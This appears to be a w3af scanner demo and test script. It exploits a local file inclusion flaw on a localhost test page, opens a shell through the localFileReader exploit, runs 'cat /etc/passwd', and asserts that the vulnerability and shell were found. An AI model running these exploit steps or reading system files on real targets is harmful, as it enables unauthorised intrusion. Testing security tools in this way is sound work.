# This is the local file inclusion demo:

plugins
audit localFileInclude
discovery webSpider
grep pathDisclosure

output console,textFile
output
output config textFile
set fileName output-w3af.txt
set verbose True
back
back

target
set target http://localhost/w3af/localFileInclusion/index2.html
back

start

exploit
exploit localFileReader

interact 0

cat /etc/passwd
list

endInteraction
back

assert len(kb.kb.getData('localFileInclude','localFileInclude')) == 1
assert len(kb.kb.getData('localFileReader','shell')) == 1

exit
